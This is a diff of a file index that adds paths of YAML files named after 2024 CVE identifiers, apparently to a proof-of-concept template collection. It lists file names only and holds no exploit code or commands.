@@ -36952,6 +36981,7 @@ ./poc/cve/CVE-2024-1049-0e66fa189b7475aa8bef5ee2db21f9f7.yaml ./poc/cve/CVE-2024-1049.yaml ./poc/cve/CVE-2024-10493-0ea5d1ba204f4cd4e380f96698fb397e.yaml +./poc/cve/CVE-2024-10493.yaml ./poc/cve/CVE-2024-1050-27175c3a9c41e19f3b6754fd15e6284b.yaml ./poc/cve/CVE-2024-1050.yaml ./poc/cve/CVE-2024-10508-9305c56dd865940b821d574327597953.yaml @@ -36959,12 +36989,15 @@ ./poc/cve/CVE-2024-1051-5e8b58bda7c4c85d551a1bc3c6ff7348.yaml ./poc/cve/CVE-2024-1051.yaml ./poc/cve/CVE-2024-10510-78ba2ace6fdbb75ae1b6ae5ea60bf1ea.yaml +./poc/cve/CVE-2024-10510.yaml ./poc/cve/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml ./poc/cve/CVE-2024-10515.yaml ./poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml ./poc/cve/CVE-2024-10516.yaml ./poc/cve/CVE-2024-10517-210079a1dc04e7802385a59afa112a94.yaml +./poc/cve/CVE-2024-10517.yaml ./poc/cve/CVE-2024-10518-8fbb12f5bd52a37d5ae88c83f3c10fed.yaml +./poc/cve/CVE-2024-10518.yaml ./poc/cve/CVE-2024-10519-e4ed2d5cfcede1f54bb2e43cfa2269d7.yaml ./poc/cve/CVE-2024-10519.yaml ./poc/cve/CVE-2024-10520-e565e8010591b8cf25b393d5f18f3d3c.yaml @@ -37016,6 +37049,7 @@ ./poc/cve/CVE-2024-10567-0a6cb3b80cd64d50d19a1e3c009329aa.yaml ./poc/cve/CVE-2024-10567.yaml ./poc/cve/CVE-2024-10568-9765873fc9eb5df11bad8c11c4bb8f5f.yaml +./poc/cve/CVE-2024-10568.yaml ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml ./poc/cve/CVE-2024-1057.yaml ./poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml @@ -37078,6 +37112,7 @@ ./poc/cve/CVE-2024-10640.yaml ./poc/cve/CVE-2024-10645-12fb06a8e024b16633ddff06befd81c1.yaml ./poc/cve/CVE-2024-10645.yaml +./poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml ./poc/cve/CVE-2024-10647-f9db24370dab16c6bbf61c415c445725.yaml ./poc/cve/CVE-2024-10647.yaml ./poc/cve/CVE-2024-10663-3da367fa8633c57d627a006d7a8ee98c.yaml 
@@ -37132,6 +37167,7 @@ ./poc/cve/CVE-2024-10689.yaml ./poc/cve/CVE-2024-1069-eade4f165a3dd4a95074ea430cf7d5a1.yaml ./poc/cve/CVE-2024-1069.yaml +./poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml ./poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml ./poc/cve/CVE-2024-10692.yaml ./poc/cve/CVE-2024-10693-c432d0b08f287a25140732c41d4a1ed1.yaml @@ -37143,7 +37179,9 @@ ./poc/cve/CVE-2024-1070-2eaf969a3130409b034463b1e7ec7297.yaml ./poc/cve/CVE-2024-1070.yaml ./poc/cve/CVE-2024-10704-a70e8bbf9a1e090c995118fbf05ef043.yaml +./poc/cve/CVE-2024-10704.yaml ./poc/cve/CVE-2024-10708-a94086c9c44731fdca495f410cfc1b1e.yaml +./poc/cve/CVE-2024-10708.yaml ./poc/cve/CVE-2024-10709-645acc80e460ffaad4f2931d5b432c17.yaml ./poc/cve/CVE-2024-10709.yaml ./poc/cve/CVE-2024-1071-2920c7e3fa1eab9da1c8d6b582e0a18a.yaml @@ -37191,6 +37229,7 @@ ./poc/cve/CVE-2024-10782-871d48d03543e0a74eec4ebf111104a8.yaml ./poc/cve/CVE-2024-10782.yaml ./poc/cve/CVE-2024-10783-194d14e49a97ce9ed7766354ddcc8c6e.yaml +./poc/cve/CVE-2024-10783.yaml ./poc/cve/CVE-2024-10784-a9a3accfcb71b14272acd952c8e27676.yaml ./poc/cve/CVE-2024-10784.yaml ./poc/cve/CVE-2024-10785-752c3d56038fb0ae320f03c3f333b1cb.yaml @@ -37323,9 +37362,11 @@ ./poc/cve/CVE-2024-10891-fa9a5840659417f63d1b11b08fefde99.yaml ./poc/cve/CVE-2024-10891.yaml ./poc/cve/CVE-2024-10893-a8b2ddc814e2620ef1ea708f58ef3008.yaml +./poc/cve/CVE-2024-10893.yaml ./poc/cve/CVE-2024-10895-125b0ba72b1a6673f446504c466d0343.yaml ./poc/cve/CVE-2024-10895.yaml ./poc/cve/CVE-2024-10896-b87b742b653c072456023acb4e76af1e.yaml +./poc/cve/CVE-2024-10896.yaml ./poc/cve/CVE-2024-10897-ab1515a8b949e2160b82943aac5fdd90.yaml ./poc/cve/CVE-2024-10897.yaml ./poc/cve/CVE-2024-10898-b43005807c533ecbdf603447a2e9841b.yaml 
@@ -37373,6 +37414,7 @@ ./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml ./poc/cve/CVE-2024-10962.yaml ./poc/cve/CVE-2024-10980-e93e9bf451e7535bca72e467980f5955.yaml +./poc/cve/CVE-2024-10980.yaml ./poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml ./poc/cve/CVE-2024-11002.yaml ./poc/cve/CVE-2024-11008-db2446809c807d08d31f51bc0a794536.yaml @@ -37382,6 +37424,7 @@ ./poc/cve/CVE-2024-11010-7519a29fa5d8193b924c132cd64d9dbf.yaml ./poc/cve/CVE-2024-11010.yaml ./poc/cve/CVE-2024-11012-07fb523fa0ee4232af334e98e3c26772.yaml +./poc/cve/CVE-2024-11012.yaml ./poc/cve/CVE-2024-11015-6e35173347ce54ae4cf946a171ea1ef3.yaml ./poc/cve/CVE-2024-11015.yaml ./poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml @@ -37424,6 +37467,7 @@ ./poc/cve/CVE-2024-11093.yaml ./poc/cve/CVE-2024-11094-16bcde675cb0d64a03b0f91cfb9ac467.yaml ./poc/cve/CVE-2024-11094.yaml +./poc/cve/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml ./poc/cve/CVE-2024-11098-1c24316a7d199994f4a28999bc5b5957.yaml ./poc/cve/CVE-2024-11098.yaml ./poc/cve/CVE-2024-1110-0fb9f8781d2d67ac9582406680f943b4.yaml @@ -37435,6 +37479,7 @@ ./poc/cve/CVE-2024-11106-389e9d6f4ce7e6f2ceef8b5009140dc7.yaml ./poc/cve/CVE-2024-11106.yaml ./poc/cve/CVE-2024-11107-eedf99f3343eab66ce27c56f82118688.yaml +./poc/cve/CVE-2024-11107.yaml ./poc/cve/CVE-2024-11118-e75c108a13b6a2366005bdd8aa42aa89.yaml ./poc/cve/CVE-2024-11118.yaml ./poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml @@ -37442,6 +37487,7 @@ ./poc/cve/CVE-2024-1112.yaml ./poc/cve/CVE-2024-11125.yaml ./poc/cve/CVE-2024-11140-59c50b763fa3b85c4c06d48cf812f8e0.yaml +./poc/cve/CVE-2024-11140.yaml ./poc/cve/CVE-2024-11143-c1f2d03748f173b3fd4ffd310317801b.yaml ./poc/cve/CVE-2024-11143.yaml ./poc/cve/CVE-2024-11150-1e0c95c68ba4bd2bce88bb13895883b7.yaml 
@@ -37457,11 +37503,13 @@ ./poc/cve/CVE-2024-11181-c4fe63ba0d26dbd617ef2b28c772fba5.yaml ./poc/cve/CVE-2024-11181.yaml ./poc/cve/CVE-2024-11183-740e0e624799af0f29235cfe4c93224c.yaml +./poc/cve/CVE-2024-11183.yaml ./poc/cve/CVE-2024-11188-51588612655d9b3510e7392186140cd0.yaml ./poc/cve/CVE-2024-11188.yaml ./poc/cve/CVE-2024-1119-f409952ee3d6dca89fd2240564c4bf88.yaml ./poc/cve/CVE-2024-1119.yaml ./poc/cve/CVE-2024-11190-815c4afdf39ca536261160cd80e26e43.yaml +./poc/cve/CVE-2024-11190.yaml ./poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml ./poc/cve/CVE-2024-11192.yaml ./poc/cve/CVE-2024-11194-fef16dd85f2f17cbac8618d7471c25a5.yaml @@ -37503,6 +37551,7 @@ ./poc/cve/CVE-2024-1122-5f1c2e67352badc3464a23f2df4684bd.yaml ./poc/cve/CVE-2024-1122.yaml ./poc/cve/CVE-2024-11221-fd998e8034a09be96ea1e90e75cb53d4.yaml +./poc/cve/CVE-2024-11221.yaml ./poc/cve/CVE-2024-11224-00fc21f7e5858419f5ee0911bc9c6261.yaml ./poc/cve/CVE-2024-11224.yaml ./poc/cve/CVE-2024-11225-4d2d005fcdf5576ec7648d7b60c4ad7d.yaml @@ -37532,6 +37581,7 @@ ./poc/cve/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml ./poc/cve/CVE-2024-1127.yaml ./poc/cve/CVE-2024-11275-206acacc954728d70b76a3dfcd2a713b.yaml +./poc/cve/CVE-2024-11275.yaml ./poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml ./poc/cve/CVE-2024-11276.yaml ./poc/cve/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml @@ -37609,6 +37659,7 @@ ./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml ./poc/cve/CVE-2024-11366.yaml ./poc/cve/CVE-2024-11367-4392dd5590d051190c7b848c08c2e24d.yaml +./poc/cve/CVE-2024-11367-b568504cdda8a316e2c2495192fa3b93.yaml ./poc/cve/CVE-2024-11367.yaml ./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml ./poc/cve/CVE-2024-11368.yaml 
@@ -37618,7 +37669,9 @@ ./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml ./poc/cve/CVE-2024-11371.yaml ./poc/cve/CVE-2024-11372-19add4c9d86c1440f92c818767e272d4.yaml +./poc/cve/CVE-2024-11372.yaml ./poc/cve/CVE-2024-11373-b5dca7f583f1b8366026d4d92294f88d.yaml +./poc/cve/CVE-2024-11373.yaml ./poc/cve/CVE-2024-11374-5e058c4cfdb79709cb4c1958dcfa10ca.yaml ./poc/cve/CVE-2024-11374.yaml ./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml @@ -37660,6 +37713,7 @@ ./poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml ./poc/cve/CVE-2024-11416.yaml ./poc/cve/CVE-2024-11417-4d82a0010b0e9010174b1d477dc61dcf.yaml +./poc/cve/CVE-2024-11417-e70cae6d6cbde8c3b8b47fc874959a2c.yaml ./poc/cve/CVE-2024-11417.yaml ./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml ./poc/cve/CVE-2024-11418.yaml @@ -37725,6 +37779,7 @@ ./poc/cve/CVE-2024-11460.yaml ./poc/cve/CVE-2024-11461-79c81f7450c8a8210454f180a585b023.yaml ./poc/cve/CVE-2024-11461.yaml +./poc/cve/CVE-2024-11462-8df69847f3be73a75d55847984a2d955.yaml ./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml ./poc/cve/CVE-2024-11463.yaml ./poc/cve/CVE-2024-11464-e3ddfb3c3eeafb3077e966e3de489912.yaml @@ -37734,6 +37789,7 @@ ./poc/cve/CVE-2024-11501-6648e003ce861122d6bdf36694ec0ac2.yaml ./poc/cve/CVE-2024-11501.yaml ./poc/cve/CVE-2024-11502-e69268cf79e16efe674087f9897a7a26.yaml +./poc/cve/CVE-2024-11502.yaml ./poc/cve/CVE-2024-1157-d2b245ef8566e249301cbac489385050.yaml ./poc/cve/CVE-2024-1157.yaml ./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml 
@@ -37787,8 +37843,16 @@ ./poc/cve/CVE-2024-11709.yaml ./poc/cve/CVE-2024-1171-a63821ba8371483619de0d156ffdf0ac.yaml ./poc/cve/CVE-2024-1171.yaml +./poc/cve/CVE-2024-11710-6b40285fd670b260b17a7200ea944ea1.yaml +./poc/cve/CVE-2024-11711-3280cdf3709d95c508956c22254e4c2e.yaml +./poc/cve/CVE-2024-11712-c31e31d712beebffc1ade29e9e31eb47.yaml +./poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml +./poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml +./poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml ./poc/cve/CVE-2024-1172-39dfeb3662991e9d246c7171e032fdd6.yaml ./poc/cve/CVE-2024-1172.yaml +./poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml +./poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml ./poc/cve/CVE-2024-11723-3366767029ed4cddc51404d71df8d881.yaml ./poc/cve/CVE-2024-11723.yaml ./poc/cve/CVE-2024-11724-daedb7c1f67f714549143733b33e7b1b.yaml 
@@ -37813,24 +37877,32 @@ ./poc/cve/CVE-2024-1175.yaml ./poc/cve/CVE-2024-11750-45ece19af7c7b8fa9097233e3847553d.yaml ./poc/cve/CVE-2024-11750.yaml +./poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml +./poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml ./poc/cve/CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811.yaml +./poc/cve/CVE-2024-11754.yaml +./poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml ./poc/cve/CVE-2024-11757-032880ca2703aa26f064cf37fbe958e7.yaml ./poc/cve/CVE-2024-11757.yaml +./poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml ./poc/cve/CVE-2024-1176-b512894031a2bed74d78afe197de5814.yaml ./poc/cve/CVE-2024-1176.yaml ./poc/cve/CVE-2024-11760-6e664de535f5a95586bf27ac0d050730.yaml ./poc/cve/CVE-2024-11760.yaml ./poc/cve/CVE-2024-11761-c12436c899eba37de36a3435c092ea47.yaml ./poc/cve/CVE-2024-11761.yaml +./poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml ./poc/cve/CVE-2024-11765-76af6f6ec0d2cae37ca638893b9e6e7c.yaml ./poc/cve/CVE-2024-11765.yaml ./poc/cve/CVE-2024-11766-fd7f6ce68e6a6e08672ed4d2add9dced.yaml ./poc/cve/CVE-2024-11766.yaml ./poc/cve/CVE-2024-11767-91a6d26ebb5178e02ef1e638799045fa.yaml +./poc/cve/CVE-2024-11767.yaml ./poc/cve/CVE-2024-11769-b830f60593d6bc500bc45458ecb55b68.yaml ./poc/cve/CVE-2024-11769.yaml ./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml ./poc/cve/CVE-2024-1177.yaml +./poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml ./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml ./poc/cve/CVE-2024-11779.yaml ./poc/cve/CVE-2024-1178-26b664c2c5e2ce23e9059d41408b3b04.yaml @@ -37852,6 +37924,7 @@ ./poc/cve/CVE-2024-11807-4dfe886308ff3702aa6f118a69b41dde.yaml ./poc/cve/CVE-2024-11807.yaml ./poc/cve/CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c.yaml +./poc/cve/CVE-2024-11809.yaml ./poc/cve/CVE-2024-1181-e1aeb270ea4b669129dd0982e0118a5d.yaml ./poc/cve/CVE-2024-1181.yaml ./poc/cve/CVE-2024-11813-9a6d1b16c5d6577e7e1c14516dfd9060.yaml 
@@ -37861,11 +37934,14 @@ ./poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml ./poc/cve/CVE-2024-11823.yaml ./poc/cve/CVE-2024-11827-1cfd9f40aa296523889f437bba603561.yaml +./poc/cve/CVE-2024-11827.yaml ./poc/cve/CVE-2024-1183.yaml ./poc/cve/CVE-2024-11832-ce764e7c1b8ba11b8ae5c2880094a1b5.yaml +./poc/cve/CVE-2024-11832.yaml ./poc/cve/CVE-2024-11840-fa84463fd67e8af47f1ae8ec0d444f84.yaml ./poc/cve/CVE-2024-11840.yaml ./poc/cve/CVE-2024-11841-f3a00a85c2a669580537ad1d561981fa.yaml +./poc/cve/CVE-2024-11841.yaml ./poc/cve/CVE-2024-11842-05f72fa98be727d359ddc8bb2735cf2c.yaml ./poc/cve/CVE-2024-11842.yaml ./poc/cve/CVE-2024-11844-07ec12dfcaf6ca937ccce1eaaff746ba.yaml 
@@ -37874,20 +37950,33 @@ ./poc/cve/CVE-2024-11853.yaml ./poc/cve/CVE-2024-11854-a4609a0b6d30b84bf011e2cc0f757890.yaml ./poc/cve/CVE-2024-11854.yaml +./poc/cve/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml +./poc/cve/CVE-2024-11865-93d2fdcff3de5132748a3e57487e9324.yaml ./poc/cve/CVE-2024-11866-3ba6e3d22ebebc0d52abd8e6540b8ac0.yaml ./poc/cve/CVE-2024-11866.yaml +./poc/cve/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml ./poc/cve/CVE-2024-11868-73a881cdb32507d918f8143682e8cdbd.yaml ./poc/cve/CVE-2024-11868.yaml +./poc/cve/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml ./poc/cve/CVE-2024-11871-59d6f7cc74f7a02c390512999ead182e.yaml ./poc/cve/CVE-2024-11871.yaml +./poc/cve/CVE-2024-11873-f2f885a30706e264c4c12ffd5cfc514f.yaml ./poc/cve/CVE-2024-11875-24c03b20fb28f6988a6747a0cda3c19a.yaml ./poc/cve/CVE-2024-11875.yaml +./poc/cve/CVE-2024-11876-9cd3f7953a8fa340c5fdf6ebfeb9bc83.yaml +./poc/cve/CVE-2024-11877-22cf6fc826469df1501c9a0f0ba687ca.yaml +./poc/cve/CVE-2024-11879-59310d2dceea2163a5176b76507b44eb.yaml ./poc/cve/CVE-2024-11880-c4c58d47a5ee0ae307eff48c75fa9422.yaml ./poc/cve/CVE-2024-11880.yaml ./poc/cve/CVE-2024-11882-ea7a3f25a6986885eafd4392096ffc0e.yaml ./poc/cve/CVE-2024-11882.yaml +./poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml +./poc/cve/CVE-2024-11884-55f612c1021e30ed6e11056cd7729031.yaml +./poc/cve/CVE-2024-11888-153488a3d489b9c026a53628a1f85eb1.yaml +./poc/cve/CVE-2024-11889-7b0c0efb6dca65612e5ac372a5bd0eb3.yaml ./poc/cve/CVE-2024-11891-5fc76ceed31c732ecf98a91613f60c7c.yaml ./poc/cve/CVE-2024-11891.yaml +./poc/cve/CVE-2024-11894-88cc7cbdaa700b8fa41789611b2b65cf.yaml ./poc/cve/CVE-2024-11897-ff5f1c15b11b473bc3f465bc84ff070d.yaml ./poc/cve/CVE-2024-11897.yaml ./poc/cve/CVE-2024-11898-e1ae02693b266829682dda11586fd4c0.yaml 
@@ -37900,7 +37989,9 @@ ./poc/cve/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml ./poc/cve/CVE-2024-11904.yaml ./poc/cve/CVE-2024-11910-f64cb945375a031c726e01062aefcdec.yaml +./poc/cve/CVE-2024-11910.yaml ./poc/cve/CVE-2024-11911-faf718aed0ef166f0179212ee8a9f3c3.yaml +./poc/cve/CVE-2024-11911.yaml ./poc/cve/CVE-2024-11914-c373722513f4866f4994cae968afdfbb.yaml ./poc/cve/CVE-2024-11914.yaml ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml @@ -37926,6 +38017,7 @@ ./poc/cve/CVE-2024-12004-f153a59c093bcc077a8d5197337c2b1a.yaml ./poc/cve/CVE-2024-12004.yaml ./poc/cve/CVE-2024-12015-a21eb9ced96f7c622c2eb418f1acf002.yaml +./poc/cve/CVE-2024-12015.yaml ./poc/cve/CVE-2024-12018-b67e863b9a9f4ab6c184953361a73ebe.yaml ./poc/cve/CVE-2024-12018.yaml ./poc/cve/CVE-2024-12026-048d32aed4281761d7c921ef3e5b09bc.yaml @@ -37944,6 +38036,7 @@ ./poc/cve/CVE-2024-12040-589a93ad55cf57c9e5956332b8034579.yaml ./poc/cve/CVE-2024-12040.yaml ./poc/cve/CVE-2024-12042-d175dab1029fa17bfb46ec52ed2225e6.yaml +./poc/cve/CVE-2024-12042.yaml ./poc/cve/CVE-2024-1205-e2d04199f24f3462f8280e4435b06ec0.yaml ./poc/cve/CVE-2024-1205.yaml ./poc/cve/CVE-2024-12059-339b76a06be0749e69485be29f27c41a.yaml @@ -38030,7 +38123,9 @@ ./poc/cve/CVE-2024-1230-c16c6920d1a9d323e3888c155daedfe0.yaml ./poc/cve/CVE-2024-1230.yaml ./poc/cve/CVE-2024-12300-fbca05b17c67e0a0b0725e51de7d84fc.yaml +./poc/cve/CVE-2024-12300.yaml ./poc/cve/CVE-2024-12309-a66a88222b4d4522bfdbcfa49436df90.yaml +./poc/cve/CVE-2024-12309.yaml ./poc/cve/CVE-2024-1231-3e05aabff416a11152b5276e4665c1a8.yaml ./poc/cve/CVE-2024-1231.yaml ./poc/cve/CVE-2024-12312-b3b87a75b93fb272d6e12dde155da819.yaml 
@@ -38064,26 +38159,50 @@ ./poc/cve/CVE-2024-1240.yaml ./poc/cve/CVE-2024-12406-875253838d8ed29a504f0efa7c687009.yaml ./poc/cve/CVE-2024-12406.yaml +./poc/cve/CVE-2024-12411-f0a38e379813866e02459d465ef6affd.yaml ./poc/cve/CVE-2024-12414-86f1cff4a3be047a175aa262edd3a292.yaml +./poc/cve/CVE-2024-12414.yaml ./poc/cve/CVE-2024-12417-4592606a248f09bd9c69bf93e7bb5817.yaml +./poc/cve/CVE-2024-12417.yaml ./poc/cve/CVE-2024-1242-a569bc45f6230e6ee70cfafb1a0c54a4.yaml ./poc/cve/CVE-2024-1242.yaml ./poc/cve/CVE-2024-12420-bd0164689b2a5de480b05483a455d4bf.yaml +./poc/cve/CVE-2024-12420.yaml ./poc/cve/CVE-2024-12421-3364cc8f248f3c81c66642b52b7e4546.yaml +./poc/cve/CVE-2024-12421.yaml +./poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml ./poc/cve/CVE-2024-12441-1756d8f05db11c9f2310e3f212f24527.yaml ./poc/cve/CVE-2024-12441-74e5d36f1605e404ac6d859d22377c3d.yaml ./poc/cve/CVE-2024-12441.yaml +./poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml +./poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml +./poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml +./poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml +./poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml ./poc/cve/CVE-2024-12461-1c77a2a88fdc8a5d22bbceec6cc12bc6.yaml ./poc/cve/CVE-2024-12461.yaml ./poc/cve/CVE-2024-12463-6eda08e61f79b144451ec9eed8e6585a.yaml ./poc/cve/CVE-2024-12463.yaml ./poc/cve/CVE-2024-12465-cee6fb491f26feabdcf3dcaa9d9a88a9.yaml +./poc/cve/CVE-2024-12465.yaml +./poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml +./poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml +./poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml +./poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml +./poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml ./poc/cve/CVE-2024-12526-d0175a79efc04628234f5b16874bd415.yaml ./poc/cve/CVE-2024-12526.yaml +./poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml 
./poc/cve/CVE-2024-12572-99c5fc1f98bec101dce40530a6fa4801.yaml +./poc/cve/CVE-2024-12572.yaml ./poc/cve/CVE-2024-12574-411e698a90aecedc46e74ff8fd9e6336.yaml +./poc/cve/CVE-2024-12574.yaml +./poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml ./poc/cve/CVE-2024-12579-8e5be395d9ca09c678a7625547b378e8.yaml +./poc/cve/CVE-2024-12579.yaml ./poc/cve/CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed.yaml +./poc/cve/CVE-2024-12581.yaml +./poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml ./poc/cve/CVE-2024-1273-7a7d027c3b90e9a4f71fda8d00cf65ff.yaml ./poc/cve/CVE-2024-1273.yaml ./poc/cve/CVE-2024-1274-99ad6cb9c59b62a5b587ddfed8885ae2.yaml @@ -43624,6 +43743,7 @@ ./poc/cve/CVE-2024-3725.yaml ./poc/cve/CVE-2024-37250-5ca0fafe07d06e20f58a95dbac8031fe.yaml ./poc/cve/CVE-2024-37250-cec91cbf25d411fc5c4746b653491fd3.yaml +./poc/cve/CVE-2024-37250.yaml ./poc/cve/CVE-2024-37253-36589268003ddfec7c7fd96d0d209541.yaml ./poc/cve/CVE-2024-37253.yaml ./poc/cve/CVE-2024-37254-ac5746faf397f9f1ccc063bbc8b11849.yaml @@ -45088,6 +45208,7 @@ ./poc/cve/CVE-2024-43221-c139bff8e07f1a30675d427e53a252b5.yaml ./poc/cve/CVE-2024-43221.yaml ./poc/cve/CVE-2024-43222-a87ec38511fe9aca759e14cc043b51af.yaml +./poc/cve/CVE-2024-43222.yaml ./poc/cve/CVE-2024-43223-307220846bdcd167f9115884d0175899.yaml ./poc/cve/CVE-2024-43223.yaml ./poc/cve/CVE-2024-43224-bf74b0250e998360257b17cb9f6cad9d.yaml @@ -45249,6 +45370,7 @@ ./poc/cve/CVE-2024-43299-c8dd9f7fde9fffe6e6504776bb91f262.yaml ./poc/cve/CVE-2024-43299.yaml ./poc/cve/CVE-2024-43300-1ff6882a36c1af79508de845a52c5f74.yaml +./poc/cve/CVE-2024-43300.yaml ./poc/cve/CVE-2024-43301-e70a166216c8c165db0d83860ef1272c.yaml ./poc/cve/CVE-2024-43301.yaml ./poc/cve/CVE-2024-43302-7eb579c0aaaf235ed55e89a50bb63283.yaml 
@@ -45577,6 +45699,7 @@ ./poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml ./poc/cve/CVE-2024-43967.yaml ./poc/cve/CVE-2024-43968-4400b028a60e9b43044e8761dabd34b3.yaml +./poc/cve/CVE-2024-43968.yaml ./poc/cve/CVE-2024-43969-abbe9736868bf38487d2e6fcf0603277.yaml ./poc/cve/CVE-2024-43969.yaml ./poc/cve/CVE-2024-4397-c362279c76703f9b7d6880221e199134.yaml @@ -46159,6 +46282,7 @@ ./poc/cve/CVE-2024-47320-f6b0315c3bcc3c744bd1900e0cbde2e8.yaml ./poc/cve/CVE-2024-47320.yaml ./poc/cve/CVE-2024-47321-f5ac5a08ba05fc79b1104aeb1b8f65d9.yaml +./poc/cve/CVE-2024-47321.yaml ./poc/cve/CVE-2024-47322-3c3616a19fd59bc87a8c7cceabf80e70.yaml ./poc/cve/CVE-2024-47322.yaml ./poc/cve/CVE-2024-47323-ba1ef6c22331af58e0db8e651bce993c.yaml @@ -46774,6 +46898,7 @@ ./poc/cve/CVE-2024-49322-7e6d37525f1528a44db12245f4e4a70b.yaml ./poc/cve/CVE-2024-49322.yaml ./poc/cve/CVE-2024-49323-61e0800fe6baa2cae8b68fbd815349c4.yaml +./poc/cve/CVE-2024-49323.yaml ./poc/cve/CVE-2024-49324-94626a2451c42720f09d79e87f8039a1.yaml ./poc/cve/CVE-2024-49324.yaml ./poc/cve/CVE-2024-49325-0df62d9e39ee3d5fce1ee7a0db78ae67.yaml @@ -46793,6 +46918,7 @@ ./poc/cve/CVE-2024-49332-4b3daa3fbf047fa59a99b065006fbbe3.yaml ./poc/cve/CVE-2024-49332.yaml ./poc/cve/CVE-2024-49334-11700dd427899256e6373b115ef06811.yaml +./poc/cve/CVE-2024-49334.yaml ./poc/cve/CVE-2024-49335-952c0d4037d50aa974ebe435838a2a76.yaml ./poc/cve/CVE-2024-49335.yaml ./poc/cve/CVE-2024-4934-b5b8c6ef935e9391d95271babb255eee.yaml @@ -47053,6 +47179,7 @@ ./poc/cve/CVE-2024-5028-2b1c7753e02398d12917feca766a8f54.yaml ./poc/cve/CVE-2024-5028.yaml ./poc/cve/CVE-2024-5029-eabfce5ae00a84e55589a7640da45e1c.yaml +./poc/cve/CVE-2024-5029.yaml ./poc/cve/CVE-2024-5030-dc496a1ae6661dbfcc2449945b36f599.yaml ./poc/cve/CVE-2024-5030.yaml ./poc/cve/CVE-2024-5031-80379b4c5e0594f1610919951372e2c7.yaml 
